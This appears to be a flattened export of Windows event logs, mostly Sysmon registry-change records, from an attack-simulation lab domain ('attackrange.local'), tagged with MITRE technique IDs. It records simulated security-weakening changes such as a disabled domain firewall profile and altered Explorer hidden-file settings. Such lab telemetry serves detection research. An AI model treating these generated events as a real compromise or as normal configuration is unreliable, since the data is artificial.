Settings\Zones\3\1206DWORD (0x00000003)AR-WIN-2\Administrator 13241300x80000000000000002476Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-01 22:39:33.687{7A09209E-1DA5-65BC-AE03-000000004703}2408C:\Windows\System32\rundll32.exeHKU\S-1-5-21-2326254190-1030894840-903314324-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000)AR-WIN-2\Administrator 13241300x80000000000000002465Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_191daa\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000002463Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_191daa\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000002461Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_191daa\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000002459Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_191daa\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000002457Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_191daa\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000002455Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 22:39:30.954{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_191daa\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000004356Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 22:06:24.700{03D06954-15E0-65BC-8C02-000000004703}5648C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004355Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 22:06:24.684{03D06954-15E0-65BC-8B02-000000004703}5636C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004354Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 22:06:24.684{03D06954-15E0-65BC-8902-000000004703}5596C:\Program Files\Mozilla Firefox\pingsender.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004304Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 22:06:17.797{03D06954-15D6-65BC-7E02-000000004703}4972C:\Program Files\Mozilla Firefox\firefox.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnableDWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000004214Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1158SetValue2024-02-01 21:54:53.838{03D06954-132D-65BC-2B02-000000004703}1316C:\Windows\system32\reg.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000001)ATTACKRANGE\Administrator 13241300x80000000000000004048Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1158SetValue2024-02-01 21:28:55.540{03D06954-0D17-65BC-8D01-000000004703}1300C:\Windows\system32\reg.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HiddenDWORD (0x00000002)ATTACKRANGE\Administrator 13241300x80000000000000003812Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 21:05:52.956{03D06954-0797-65BC-C800-000000004703}4740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003811Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 21:05:52.956{03D06954-0797-65BC-C800-000000004703}4740\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 100304000x8000000000000023411Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 0 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259160)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023407Applicationar-win-dc.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 13241300x80000000000000003675Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.342{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_4f7b6\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003673Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.342{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_4f7b6\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003671Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.342{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_4f7b6\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003669Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.342{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_4f7b6\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003667Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.326{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_4f7b6\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000003665Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 21:02:19.326{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_4f7b6\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000003618Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 21:02:07.872{03D06954-06A3-65BC-0A00-000000004703}584C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003611Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 21:02:07.107{03D06954-06A6-65BC-1300-000000004703}336C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{3463440D-9766-4466-B558-9D7FB711F385}\NameTypeDWORD (0x00000006)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000003609Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 21:02:07.107{03D06954-06A6-65BC-1300-000000004703}336C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{3463440D-9766-4466-B558-9D7FB711F385}\CategoryDWORD (0x00000002)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000003608Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 21:02:07.107{03D06954-06A6-65BC-1300-000000004703}336C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{3463440D-9766-4466-B558-9D7FB711F385}\ManagedDWORD (0x00000001)NT AUTHORITY\LOCAL SERVICE 614000x8000400000000000166834Systemar-win-dc.attackrange.local0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-000C-0000-09DE-66D25155DA01} 614000x8000400000000000166833Systemar-win-dc.attackrange.local0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-000B-0000-3F7E-64D25155DA01} 614000x8000400000000000166832Systemar-win-dc.attackrange.local0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-000A-0000-3F7E-64D25155DA01} 614000x8000400000000000166798Systemar-win-dc.attackrange.local0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0007-0000-196B-05CF5155DA01} 614000x8000400000000000166797Systemar-win-dc.attackrange.local0x01009DfsDriver2023-05-05T02:33:31.000000000Z184{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "Filter" , "instances" : [["405000","0x00000001"]] }{02000000-0006-0000-9F56-DFCE5155DA01} 614000x8000400000000000166796Systemar-win-dc.attackrange.local0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0005-0000-C0E2-DCCE5155DA01} 614000x8000400000000000166794Systemar-win-dc.attackrange.local0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0003-0000-B84E-A1CE5155DA01} 614000x8000400000000000166793Systemar-win-dc.attackrange.local0x01006DfsrRo2016-07-16T02:20:37.000000000Z203{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Content Screener" , "instances" : [["261100","0x00000000"]] }{02000000-0002-0000-9783-9CCE5155DA01} 614000x8000400000000000166792Systemar-win-dc.attackrange.local0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-9783-9CCE5155DA01} 13241300x80000000000000003267Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:55:22.756{03D06954-0199-65BC-1200-000000004603}364C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{C4CE6D26-C658-4895-975D-DA915CA76167}\CategoryTypeDWORD (0x00000000)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000003266Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:55:22.756{03D06954-0199-65BC-1200-000000004603}364C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{C4CE6D26-C658-4895-975D-DA915CA76167}\CategoryDWORD (0x00000001)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000003112Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:53:10.675{03D06954-04B5-65BC-ED02-000000004603}4640C:\Windows\System32\rundll32.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1809DWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000003111Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:53:10.675{03D06954-04B5-65BC-ED02-000000004603}4640C:\Windows\System32\rundll32.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206DWORD (0x00000003)ATTACKRANGE\Administrator 13241300x80000000000000003110Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:53:10.464{03D06954-04B5-65BC-ED02-000000004603}4640C:\Windows\System32\rundll32.exeHKU\S-1-5-21-3344543075-1022232225-2459664213-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500DWORD (0x00000000)ATTACKRANGE\Administrator 13241300x80000000000000003083Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 20:52:56.340{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000003081Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.824{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003079Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\WpnUserService_161ddc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003077Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UserDataSvc_161ddc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003075Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\UnistoreSvc_161ddc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003073Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_161ddc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000003071Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\OneSyncSvc_161ddc\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000003069Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1031,T1050SetValue2024-02-01 20:52:55.439{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\CDPUserSvc_161ddc\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000002963Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 20:50:24.668{03D06954-0195-65BC-0A00-000000004603}588C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001742Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 20:50:06.753{7A09209E-03EC-65BC-F400-000000004703}3524\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001741Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 20:50:06.753{7A09209E-03EC-65BC-F400-000000004703}3524\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 100304000x8000000000000023371Applicationar-win-2.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259176)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023370Applicationar-win-2.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 13241300x80000000000000001251Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1031,T1050SetValue2024-02-01 20:45:59.434{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IKEEXT\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001250Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1089SetValue2024-02-01 20:45:59.325{7A09209E-02FA-65BC-1600-000000004703}1232C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewallDWORD (0x00000000)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001146Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-01 20:45:48.480{7A09209E-02F9-65BC-0A00-000000004703}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Control\Lsa\nolmhashDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001134Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.local-SetValue2024-02-01 20:45:47.120{7A09209E-02FA-65BC-1300-000000004703}980C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational\EnabledDWORD (0x00000001)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001122Microsoft-Windows-Sysmon/Operationalar-win-2.attackrange.localT1101SetValue2024-02-01 20:45:46.245{7A09209E-02F9-65BC-0B00-000000004703}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\ProductTypeDWORD (0x00000008)NT AUTHORITY\SYSTEM 614000x8000400000000000166598Systemar-win-2.attackrange.local0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-0008-0000-F35B-F3A14F55DA01} 614000x8000400000000000166597Systemar-win-2.attackrange.local0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-0007-0000-B7F9-F0A14F55DA01} 614000x8000400000000000166596Systemar-win-2.attackrange.local0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-0006-0000-B7F9-F0A14F55DA01} 13241300x80000000000000002545Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 20:45:44.993{03D06954-02F8-65BC-2401-000000004603}3992C:\Windows\system32\reg.exeHKLM\System\CurrentControlSet\Control\Lsa\Kerberos\Parameters\LogLevelDWORD (0x00000001)ATTACKRANGE\Administrator 614000x8000400000000000166558Systemar-win-2.attackrange.local0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false 